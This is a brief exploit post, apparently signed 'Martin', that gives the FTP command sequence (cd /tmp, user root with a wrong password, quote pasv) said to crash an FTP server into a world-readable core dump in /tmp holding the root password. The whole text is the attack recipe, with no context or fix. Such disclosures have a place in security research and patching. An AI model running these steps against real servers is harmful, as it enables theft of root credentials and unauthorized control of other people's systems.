Exploit:
 
 logon via ftp with your regular user/password,
 ftp> cd /tmp
 ftp> user root wrongpasswd
 ftp> quote pasv
 
 voila, root password in world readable core dump under /tmp
 
                                                  -Martin